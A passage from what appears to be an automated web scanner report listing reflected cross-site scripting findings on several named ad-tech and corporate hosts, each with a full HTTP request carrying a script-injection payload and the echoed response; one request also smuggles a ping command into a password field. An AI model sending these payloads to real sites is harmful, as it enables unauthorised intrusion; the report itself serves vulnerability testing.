Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 35b4c<script>alert(1)</script>b4350c97119 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-1134822682510879%26output%3Dhtml%26h%3D600%26slotname%3D3061072279%26w%3D160%26lmt%3D1303759227%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fgames.webalta.ru%252F%26dt%3D1303741227549%26bpp%3D5%26shv%3Dr20110420%26jsv%3Dr20110415%26correlator%3D1303741227571%26frm%3D0%26adk%3D1110337129%26ga_vid%3D973557293.1303741228%26ga_sid%3D1303741228%26ga_hid%3D154889240%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1125%26bih%3D929%26fu%3D0%26ifi%3D1%26dtd%3D35%26xpc%3DnaYdoqC7iz%26p%3Dhttp%253A%2F%2Fgames.webalta.ru&uid=ZC45X9Axu6NOUFfX_28966835b4c<script>alert(1)</script>b4350c97119&xy=0%2C0&wh=160%2C600&vchannel=69113&cid=166308&iad=1303741233200-54504055902361870&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=79DACCAB16BC495962702839F5429393; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Mon, 25 Apr 2011 14:23:59 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_28966835b4c<script>alert(1)</script>b4350c97119");

5.10. https://hourly.deploy.com/hmc/report/ ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The value of the '"--></style></script><script>netsparker(0x000054)</script> request parameter is copied into the HTML document as plain text between tags. The payload e3cac<script>alert(1)</script>5fcd26dde92 was submitted in the '"--></style></script><script>netsparker(0x000054)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/?'"--></style></script><script>netsparker(0x000054)</script>e3cac<script>alert(1)</script>5fcd26dde92 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:10 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:10 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:10 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</script>e3cac<script>alert(1)</script>5fcd26dde92" method="post">
...[SNIP]...

5.11. https://hourly.deploy.com/hmc/report/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 955ef"><script>alert(1)</script>eaec9f444c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/?955ef"><script>alert(1)</script>eaec9f444c3=1 HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:32 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=d830da3836cd39735b3d;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:32 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:32 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:39:32 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4880


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?955ef"><script>alert(1)</script>eaec9f444c3=1" method="post">
...[SNIP]...

5.12. https://hourly.deploy.com/hmc/report/ [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ff7d"><script>alert(1)</script>22906d443c3 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000002)%3C/script%3E8ff7d"><script>alert(1)</script>22906d443c3 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?nsextt='%22--%3e%3c/style%3e%3c/script%3e%3cscript%3enetsparker(0x000002)%3c/script%3e8ff7d"><script>alert(1)</script>22906d443c3" method="post">
...[SNIP]...

5.13. https://hourly.deploy.com/hmc/report/ [register parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The value of the register request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7121"><script>alert(1)</script>df0c78cb9fa was submitted in the register parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/?register=1e7121"><script>alert(1)</script>df0c78cb9fa HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:30 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?register=1e7121"><script>alert(1)</script>df0c78cb9fa" method="post" onSubmit="document.form1.register.disabled='disabled';">
...[SNIP]...

5.14. https://hourly.deploy.com/hmc/report/index.cfm ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The value of the '"--></style></script><script>netsparker(0x00004F)</script> request parameter is copied into the HTML document as plain text between tags. The payload e83be<script>alert(1)</script>523da594bd0 was submitted in the '"--></style></script><script>netsparker(0x00004F)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm?'"--></style></script><script>netsparker(0x00004F)</script>e83be<script>alert(1)</script>523da594bd0 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:07 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:07 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:07 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</script>e83be<script>alert(1)</script>523da594bd0" method="post">
...[SNIP]...

5.15. https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The value of the j_username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fe1a"><script>alert(1)</script>db5eebe2940 was submitted in the j_username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /hmc/report/index.cfm? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 63

j_password=%26ping%20-c%2026%20127.0.0.1%20%26&j_username=Smith7fe1a"><script>alert(1)</script>db5eebe2940

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=3e302c38d98d257a233c;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:03 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value="Smith7fe1a"><script>alert(1)</script>db5eebe2940" onKeyPress="checkEnter();">
...[SNIP]...

5.16. https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The value of the j_username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7302a"><script>alert(1)</script>4a4bb4d857e243994 was submitted in the j_username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hmc/report/index.cfm?j_password=&j_username=7302a"><script>alert(1)</script>4a4bb4d857e243994 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:32 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:32 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:32 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?j_password=&j_username=7302a"><script>alert(1)</script>4a4bb4d857e243994" method="post">
...[SNIP]...

5.17. https://hourly.deploy.com/hmc/report/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3979a"><script>alert(1)</script>e93cf277ffd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm?3979a"><script>alert(1)</script>e93cf277ffd=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:33 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:33 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:33 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?3979a"><script>alert(1)</script>e93cf277ffd=1" method="post">
...[SNIP]...

5.18. https://hourly.deploy.com/hmc/report/index.cfm [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48f1"><script>alert(1)</script>05d2c68e84e was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000004)%3C/script%3Ed48f1"><script>alert(1)</script>05d2c68e84e HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:43 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?nsextt='%22--%3e%3c/style%3e%3c/script%3e%3cscript%3enetsparker(0x000004)%3c/script%3ed48f1"><script>alert(1)</script>05d2c68e84e" method="post">
...[SNIP]...

5.19. https://hourly.deploy.com/hmc/report/index.cfm [register parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The value of the register request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d039e"><script>alert(1)</script>e3b5619accb was submitted in the register parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm?register=1d039e"><script>alert(1)</script>e3b5619accb HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:31 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?register=1d039e"><script>alert(1)</script>e3b5619accb" method="post" onSubmit="document.form1.register.disabled='disabled';">
...[SNIP]...

5.20. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm/%22ns=%22netsparker(0x000042)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ec4"><script>alert(1)</script>93019b07260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm/%22ns=%22netsparker(0x000042)?20ec4"><script>alert(1)</script>93019b07260=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:10 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:10 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:10 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?20ec4"><script>alert(1)</script>93019b07260=1" method="post">
...[SNIP]...

5.21. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d3a0"><script>alert(1)</script>c00f54e3219 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)?7d3a0"><script>alert(1)</script>c00f54e3219=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:11 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:11 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:11 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?7d3a0"><script>alert(1)</script>c00f54e3219=1" method="post">
...[SNIP]...

5.22. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4615b'-alert(1)-'2e372cc3b5e was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=zczMzMzMCEDNzMzMzMwIQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAArylOPgAAAAA.&tt_code=vert-105&udj=uf%28%27a%27%2C+9797%2C+1303741217%29%3Buf%28%27c%27%2C+45814%2C+1303741217%29%3Buf%28%27r%27%2C+173254%2C+1303741217%29%3Bppv%288991%2C+%271998880197657583851%27%2C+1303741217%2C+1303784417%2C+45814%2C+25553%29%3B&cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.4615b'-alert(1)-'2e372cc3b5e&referrer=http://games.webalta.ru/&pp=TbWDIAAIVuAK7GZH3ItXr3JmF2XbbmiM84zMSQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7bc#zzr0=8j3jr-Ma8ZQ96*Jn4c[MSbx7njQ]@5'@YHOv]@%<7Aq6u^k]-O]7X=1o.SL4qu$o)jqNzHS=TC4(9F1:<#$U]bx!=zjV%>biGH%bdq58FLtlq2:d$JgUh5$4Iot#6@4.4J[*tG':4rrG+c3fEC-3df(zv7VQ@s]44`jFA-UO$V13P'.UTvPWL@iN5yP*wBe_0S+@C*@L7VvSaWmx$R!Rcj1*R:>#h2<bHAYq9bP+EfQqhMvlCKL>_w7fS(X)h1Nww_5fdG`1qm>g6vDz?4Kjlnm+'z[>O[I?A2K@R'5'-#ByUV8APmF!5j^hik=DN

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly
